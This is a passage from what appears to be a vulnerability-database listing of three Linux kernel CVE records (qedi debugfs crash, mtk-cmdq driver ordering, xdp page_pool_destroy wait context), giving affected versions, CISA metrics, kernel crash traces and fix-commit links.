Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:56.066Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/56bec63a7fc87ad50b3373a87517dc9770eef9e0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/21c963de2e86e88f6a8ca556bcebb8e62ab8e901"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/144d76a676b630e321556965011b00e2de0b40a7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/397a8990c377ee4b61d6df768e61dff9e316d46b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eaddb86637669f6bad89245ee63f8fb2bfb50241"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fa85b016a56b9775a3fe41e5d26e666945963b46"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e2f433ea7d0ff77998766a088a287337fb43ad75"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/28027ec8e32ecbadcd67623edb290dad61e735b5"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-40978",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:02:30.760177Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:21.743Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qedi/qedi_debugfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "56bec63a7fc87ad50b3373a87517dc9770eef9e0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "21c963de2e86e88f6a8ca556bcebb8e62ab8e901",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "144d76a676b630e321556965011b00e2de0b40a7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "397a8990c377ee4b61d6df768e61dff9e316d46b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "eaddb86637669f6bad89245ee63f8fb2bfb50241",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "fa85b016a56b9775a3fe41e5d26e666945963b46",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e2f433ea7d0ff77998766a088a287337fb43ad75",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "28027ec8e32ecbadcd67623edb290dad61e735b5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qedi/qedi_debugfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.317",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.96",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.36",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.317",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.96",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qedi: Fix crash while reading debugfs attribute\n\nThe qedi_dbg_do_not_recover_cmd_read() function invokes sprintf() directly\non a __user pointer, which results into the crash.\n\nTo fix this issue, use a small local stack buffer for sprintf() and then\ncall simple_read_from_buffer(), which in turns make the copy_to_user()\ncall.\n\nBUG: unable to handle page fault for address: 00007f4801111000\nPGD 8000000864df6067 P4D 8000000864df6067 PUD 864df7067 PMD 846028067 PTE 0\nOops: 0002 [#1] PREEMPT SMP PTI\nHardware name: HPE ProLiant DL380 Gen10/ProLiant DL380 Gen10, BIOS U30 06/15/2023\nRIP: 0010:memcpy_orig+0xcd/0x130\nRSP: 0018:ffffb7a18c3ffc40 EFLAGS: 00010202\nRAX: 00007f4801111000 RBX: 00007f4801111000 RCX: 000000000000000f\nRDX: 000000000000000f RSI: ffffffffc0bfd7a0 RDI: 00007f4801111000\nRBP: ffffffffc0bfd7a0 R08: 725f746f6e5f6f64 R09: 3d7265766f636572\nR10: ffffb7a18c3ffd08 R11: 0000000000000000 R12: 00007f4881110fff\nR13: 000000007fffffff R14: ffffb7a18c3ffca0 R15: ffffffffc0bfd7af\nFS: 00007f480118a740(0000) GS:ffff98e38af00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f4801111000 CR3: 0000000864b8e001 CR4: 00000000007706e0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n ? __die_body+0x1a/0x60\n ? page_fault_oops+0x183/0x510\n ? exc_page_fault+0x69/0x150\n ? asm_exc_page_fault+0x22/0x30\n ? memcpy_orig+0xcd/0x130\n vsnprintf+0x102/0x4c0\n sprintf+0x51/0x80\n qedi_dbg_do_not_recover_cmd_read+0x2f/0x50 [qedi 6bcfdeeecdea037da47069eca2ba717c84a77324]\n full_proxy_read+0x50/0x80\n vfs_read+0xa5/0x2e0\n ? folio_add_new_anon_rmap+0x44/0xa0\n ? set_pte_at+0x15/0x30\n ? do_pte_missing+0x426/0x7f0\n ksys_read+0xa5/0xe0\n do_syscall_64+0x58/0x80\n ? __count_memcg_events+0x46/0x90\n ? count_memcg_event_mm+0x3d/0x60\n ? handle_mm_fault+0x196/0x2f0\n ? do_user_addr_fault+0x267/0x890\n ? exc_page_fault+0x69/0x150\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\nRIP: 0033:0x7f4800f20b4d"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:19:14.413Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/56bec63a7fc87ad50b3373a87517dc9770eef9e0"
},
{
"url": "https://git.kernel.org/stable/c/21c963de2e86e88f6a8ca556bcebb8e62ab8e901"
},
{
"url": "https://git.kernel.org/stable/c/144d76a676b630e321556965011b00e2de0b40a7"
},
{
"url": "https://git.kernel.org/stable/c/397a8990c377ee4b61d6df768e61dff9e316d46b"
},
{
"url": "https://git.kernel.org/stable/c/eaddb86637669f6bad89245ee63f8fb2bfb50241"
},
{
"url": "https://git.kernel.org/stable/c/fa85b016a56b9775a3fe41e5d26e666945963b46"
},
{
"url": "https://git.kernel.org/stable/c/e2f433ea7d0ff77998766a088a287337fb43ad75"
},
{
"url": "https://git.kernel.org/stable/c/28027ec8e32ecbadcd67623edb290dad61e735b5"
}
],
"title": "scsi: qedi: Fix crash while reading debugfs attribute",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-40978",
"datePublished": "2024-07-12T12:32:14.149Z",
"dateReserved": "2024-07-12T12:17:45.604Z",
"dateUpdated": "2025-05-04T09:19:14.413Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42319 (GCVE-0-2024-42319)
Vulnerability from cvelistv5
Published
2024-08-17 09:09
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mailbox: mtk-cmdq: Move devm_mbox_controller_register() after devm_pm_runtime_enable()
When mtk-cmdq unbinds, a WARN_ON message with condition
pm_runtime_get_sync() < 0 occurs.
According to the call tracei below:
cmdq_mbox_shutdown
mbox_free_channel
mbox_controller_unregister
__devm_mbox_controller_unregister
...
The root cause can be deduced to be calling pm_runtime_get_sync() after
calling pm_runtime_disable() as observed below:
1. CMDQ driver uses devm_mbox_controller_register() in cmdq_probe()
to bind the cmdq device to the mbox_controller, so
devm_mbox_controller_unregister() will automatically unregister
the device bound to the mailbox controller when the device-managed
resource is removed. That means devm_mbox_controller_unregister()
and cmdq_mbox_shoutdown() will be called after cmdq_remove().
2. CMDQ driver also uses devm_pm_runtime_enable() in cmdq_probe() after
devm_mbox_controller_register(), so that devm_pm_runtime_disable()
will be called after cmdq_remove(), but before
devm_mbox_controller_unregister().
To fix this problem, cmdq_probe() needs to move
devm_mbox_controller_register() after devm_pm_runtime_enable() to make
devm_pm_runtime_disable() be called after
devm_mbox_controller_unregister().
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42319",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:09:32.477080Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:26.095Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/mailbox/mtk-cmdq-mailbox.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1403991a40b94438a2acc749bf05c117abdb34f9",
"status": "affected",
"version": "623a6143a845bd485b00ba684f0ccef11835edab",
"versionType": "git"
},
{
"lessThan": "d00df6700ad10974a7e20646956f4ff22cdbe0ec",
"status": "affected",
"version": "623a6143a845bd485b00ba684f0ccef11835edab",
"versionType": "git"
},
{
"lessThan": "11fa625b45faf0649118b9deaf2d31c86ac41911",
"status": "affected",
"version": "623a6143a845bd485b00ba684f0ccef11835edab",
"versionType": "git"
},
{
"lessThan": "a8bd68e4329f9a0ad1b878733e0f80be6a971649",
"status": "affected",
"version": "623a6143a845bd485b00ba684f0ccef11835edab",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/mailbox/mtk-cmdq-mailbox.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.120",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.64",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmailbox: mtk-cmdq: Move devm_mbox_controller_register() after devm_pm_runtime_enable()\n\nWhen mtk-cmdq unbinds, a WARN_ON message with condition\npm_runtime_get_sync() \u003c 0 occurs.\n\nAccording to the call tracei below:\n cmdq_mbox_shutdown\n mbox_free_channel\n mbox_controller_unregister\n __devm_mbox_controller_unregister\n ...\n\nThe root cause can be deduced to be calling pm_runtime_get_sync() after\ncalling pm_runtime_disable() as observed below:\n1. CMDQ driver uses devm_mbox_controller_register() in cmdq_probe()\n to bind the cmdq device to the mbox_controller, so\n devm_mbox_controller_unregister() will automatically unregister\n the device bound to the mailbox controller when the device-managed\n resource is removed. That means devm_mbox_controller_unregister()\n and cmdq_mbox_shoutdown() will be called after cmdq_remove().\n2. CMDQ driver also uses devm_pm_runtime_enable() in cmdq_probe() after\n devm_mbox_controller_register(), so that devm_pm_runtime_disable()\n will be called after cmdq_remove(), but before\n devm_mbox_controller_unregister().\n\nTo fix this problem, cmdq_probe() needs to move\ndevm_mbox_controller_register() after devm_pm_runtime_enable() to make\ndevm_pm_runtime_disable() be called after\ndevm_mbox_controller_unregister()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:40.471Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1403991a40b94438a2acc749bf05c117abdb34f9"
},
{
"url": "https://git.kernel.org/stable/c/d00df6700ad10974a7e20646956f4ff22cdbe0ec"
},
{
"url": "https://git.kernel.org/stable/c/11fa625b45faf0649118b9deaf2d31c86ac41911"
},
{
"url": "https://git.kernel.org/stable/c/a8bd68e4329f9a0ad1b878733e0f80be6a971649"
}
],
"title": "mailbox: mtk-cmdq: Move devm_mbox_controller_register() after devm_pm_runtime_enable()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42319",
"datePublished": "2024-08-17T09:09:31.867Z",
"dateReserved": "2024-07-30T07:40:12.278Z",
"dateUpdated": "2025-05-04T09:26:40.471Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43834 (GCVE-0-2024-43834)
Vulnerability from cvelistv5
Published
2024-08-17 09:21
Modified
2025-05-04 12:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
xdp: fix invalid wait context of page_pool_destroy()
If the driver uses a page pool, it creates a page pool with
page_pool_create().
The reference count of page pool is 1 as default.
A page pool will be destroyed only when a reference count reaches 0.
page_pool_destroy() is used to destroy page pool, it decreases a
reference count.
When a page pool is destroyed, ->disconnect() is called, which is
mem_allocator_disconnect().
This function internally acquires mutex_lock().
If the driver uses XDP, it registers a memory model with
xdp_rxq_info_reg_mem_model().
The xdp_rxq_info_reg_mem_model() internally increases a page pool
reference count if a memory model is a page pool.
Now the reference count is 2.
To destroy a page pool, the driver should call both page_pool_destroy()
and xdp_unreg_mem_model().
The xdp_unreg_mem_model() internally calls page_pool_destroy().
Only page_pool_destroy() decreases a reference count.
If a driver calls page_pool_destroy() then xdp_unreg_mem_model(), we
will face an invalid wait context warning.
Because xdp_unreg_mem_model() calls page_pool_destroy() with
rcu_read_lock().
The page_pool_destroy() internally acquires mutex_lock().
Splat looks like:
=============================
[ BUG: Invalid wait context ]
6.10.0-rc6+ #4 Tainted: G W
-----------------------------
ethtool/1806 is trying to lock:
ffffffff90387b90 (mem_id_lock){+.+.}-{4:4}, at: mem_allocator_disconnect+0x73/0x150
other info that might help us debug this:
context-{5:5}
3 locks held by ethtool/1806:
stack backtrace:
CPU: 0 PID: 1806 Comm: ethtool Tainted: G W 6.10.0-rc6+ #4 f916f41f172891c800f2fed
Hardware name: ASUS System Product Name/PRIME Z690-P D4, BIOS 0603 11/01/2021
Call Trace:
<TASK>
dump_stack_lvl+0x7e/0xc0
__lock_acquire+0x1681/0x4de0
? _printk+0x64/0xe0
? __pfx_mark_lock.part.0+0x10/0x10
? __pfx___lock_acquire+0x10/0x10
lock_acquire+0x1b3/0x580
? mem_allocator_disconnect+0x73/0x150
? __wake_up_klogd.part.0+0x16/0xc0
? __pfx_lock_acquire+0x10/0x10
? dump_stack_lvl+0x91/0xc0
__mutex_lock+0x15c/0x1690
? mem_allocator_disconnect+0x73/0x150
? __pfx_prb_read_valid+0x10/0x10
? mem_allocator_disconnect+0x73/0x150
? __pfx_llist_add_batch+0x10/0x10
? console_unlock+0x193/0x1b0
? lockdep_hardirqs_on+0xbe/0x140
? __pfx___mutex_lock+0x10/0x10
? tick_nohz_tick_stopped+0x16/0x90
? __irq_work_queue_local+0x1e5/0x330
? irq_work_queue+0x39/0x50
? __wake_up_klogd.part.0+0x79/0xc0
? mem_allocator_disconnect+0x73/0x150
mem_allocator_disconnect+0x73/0x150
? __pfx_mem_allocator_disconnect+0x10/0x10
? mark_held_locks+0xa5/0xf0
? rcu_is_watching+0x11/0xb0
page_pool_release+0x36e/0x6d0
page_pool_destroy+0xd7/0x440
xdp_unreg_mem_model+0x1a7/0x2a0
? __pfx_xdp_unreg_mem_model+0x10/0x10
? kfree+0x125/0x370
? bnxt_free_ring.isra.0+0x2eb/0x500
? bnxt_free_mem+0x5ac/0x2500
xdp_rxq_info_unreg+0x4a/0xd0
bnxt_free_mem+0x1356/0x2500
bnxt_close_nic+0xf0/0x3b0
? __pfx_bnxt_close_nic+0x10/0x10
? ethnl_parse_bit+0x2c6/0x6d0
? __pfx___nla_validate_parse+0x10/0x10
? __pfx_ethnl_parse_bit+0x10/0x10
bnxt_set_features+0x2a8/0x3e0
__netdev_update_features+0x4dc/0x1370
? ethnl_parse_bitset+0x4ff/0x750
? __pfx_ethnl_parse_bitset+0x10/0x10
? __pfx___netdev_update_features+0x10/0x10
? mark_held_locks+0xa5/0xf0
? _raw_spin_unlock_irqrestore+0x42/0x70
? __pm_runtime_resume+0x7d/0x110
ethnl_set_features+0x32d/0xa20
To fix this problem, it uses rhashtable_lookup_fast() instead of
rhashtable_lookup() with rcu_read_lock().
Using xa without rcu_read_lock() here is safe.
xa is freed by __xdp_mem_allocator_rcu_free() and this is called by
call_rcu() of mem_xa_remove().
The mem_xa_remove() is called by page_pool_destroy() if a reference
count reaches 0.
The xa is already protected by the reference count mechanism well in the
control plane.
So removing rcu_read_lock() for page_pool_destroy() is safe.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c3f812cea0d7006469d1cf33a4a9f0a12bb4b3a3 Version: c3f812cea0d7006469d1cf33a4a9f0a12bb4b3a3 Version: c3f812cea0d7006469d1cf33a4a9f0a12bb4b3a3 Version: c3f812cea0d7006469d1cf33a4a9f0a12bb4b3a3 Version: c3f812cea0d7006469d1cf33a4a9f0a12bb4b3a3 Version: c3f812cea0d7006469d1cf33a4a9f0a12bb4b3a3 Version: bf22306d92ca59c59dc4aa3bab14768948193d56 Version: 05f646cb2174d1a4e032b60b99097f5c4b522616 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43834",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:08:18.214810Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:23.448Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/core/xdp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "be9d08ff102df3ac4f66e826ea935cf3af63a4bd",
"status": "affected",
"version": "c3f812cea0d7006469d1cf33a4a9f0a12bb4b3a3",
"versionType": "git"
},
{
"lessThan": "6c390ef198aa69795427a5cb5fd7cb4bc7e6cd7a",
"status": "affected",
"version": "c3f812cea0d7006469d1cf33a4a9f0a12bb4b3a3",
"versionType": "git"
},
{
"lessThan": "3fc1be360b99baeea15cdee3cf94252cd3a72d26",
"status": "affected",
"version": "c3f812cea0d7006469d1cf33a4a9f0a12bb4b3a3",
"versionType": "git"
},
{
"lessThan": "bf0ce5aa5f2525ed1b921ba36de96e458e77f482",
"status": "affected",
"version": "c3f812cea0d7006469d1cf33a4a9f0a12bb4b3a3",
"versionType": "git"
},
{
"lessThan": "12144069209eec7f2090ce9afa15acdcc2c2a537",
"status": "affected",
"version": "c3f812cea0d7006469d1cf33a4a9f0a12bb4b3a3",
"versionType": "git"
},
{
"lessThan": "59a931c5b732ca5fc2ca727f5a72aeabaafa85ec",
"status": "affected",
"version": "c3f812cea0d7006469d1cf33a4a9f0a12bb4b3a3",
"versionType": "git"
},
{
"status": "affected",
"version": "bf22306d92ca59c59dc4aa3bab14768948193d56",
"versionType": "git"
},
{
"status": "affected",
"version": "05f646cb2174d1a4e032b60b99097f5c4b522616",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/core/xdp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.5"
},
{
"lessThan": "5.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxdp: fix invalid wait context of page_pool_destroy()\n\nIf the driver uses a page pool, it creates a page pool with\npage_pool_create().\nThe reference count of page pool is 1 as default.\nA page pool will be destroyed only when a reference count reaches 0.\npage_pool_destroy() is used to destroy page pool, it decreases a\nreference count.\nWhen a page pool is destroyed, -\u003edisconnect() is called, which is\nmem_allocator_disconnect().\nThis function internally acquires mutex_lock().\n\nIf the driver uses XDP, it registers a memory model with\nxdp_rxq_info_reg_mem_model().\nThe xdp_rxq_info_reg_mem_model() internally increases a page pool\nreference count if a memory model is a page pool.\nNow the reference count is 2.\n\nTo destroy a page pool, the driver should call both page_pool_destroy()\nand xdp_unreg_mem_model().\nThe xdp_unreg_mem_model() internally calls page_pool_destroy().\nOnly page_pool_destroy() decreases a reference count.\n\nIf a driver calls page_pool_destroy() then xdp_unreg_mem_model(), we\nwill face an invalid wait context warning.\nBecause xdp_unreg_mem_model() calls page_pool_destroy() with\nrcu_read_lock().\nThe page_pool_destroy() internally acquires mutex_lock().\n\nSplat looks like:\n=============================\n[ BUG: Invalid wait context ]\n6.10.0-rc6+ #4 Tainted: G W\n-----------------------------\nethtool/1806 is trying to lock:\nffffffff90387b90 (mem_id_lock){+.+.}-{4:4}, at: mem_allocator_disconnect+0x73/0x150\nother info that might help us debug this:\ncontext-{5:5}\n3 locks held by ethtool/1806:\nstack backtrace:\nCPU: 0 PID: 1806 Comm: ethtool Tainted: G W 6.10.0-rc6+ #4 f916f41f172891c800f2fed\nHardware name: ASUS System Product Name/PRIME Z690-P D4, BIOS 0603 11/01/2021\nCall Trace:\n\u003cTASK\u003e\ndump_stack_lvl+0x7e/0xc0\n__lock_acquire+0x1681/0x4de0\n? _printk+0x64/0xe0\n? __pfx_mark_lock.part.0+0x10/0x10\n? __pfx___lock_acquire+0x10/0x10\nlock_acquire+0x1b3/0x580\n? mem_allocator_disconnect+0x73/0x150\n? __wake_up_klogd.part.0+0x16/0xc0\n? __pfx_lock_acquire+0x10/0x10\n? dump_stack_lvl+0x91/0xc0\n__mutex_lock+0x15c/0x1690\n? mem_allocator_disconnect+0x73/0x150\n? __pfx_prb_read_valid+0x10/0x10\n? mem_allocator_disconnect+0x73/0x150\n? __pfx_llist_add_batch+0x10/0x10\n? console_unlock+0x193/0x1b0\n? lockdep_hardirqs_on+0xbe/0x140\n? __pfx___mutex_lock+0x10/0x10\n? tick_nohz_tick_stopped+0x16/0x90\n? __irq_work_queue_local+0x1e5/0x330\n? irq_work_queue+0x39/0x50\n? __wake_up_klogd.part.0+0x79/0xc0\n? mem_allocator_disconnect+0x73/0x150\nmem_allocator_disconnect+0x73/0x150\n? 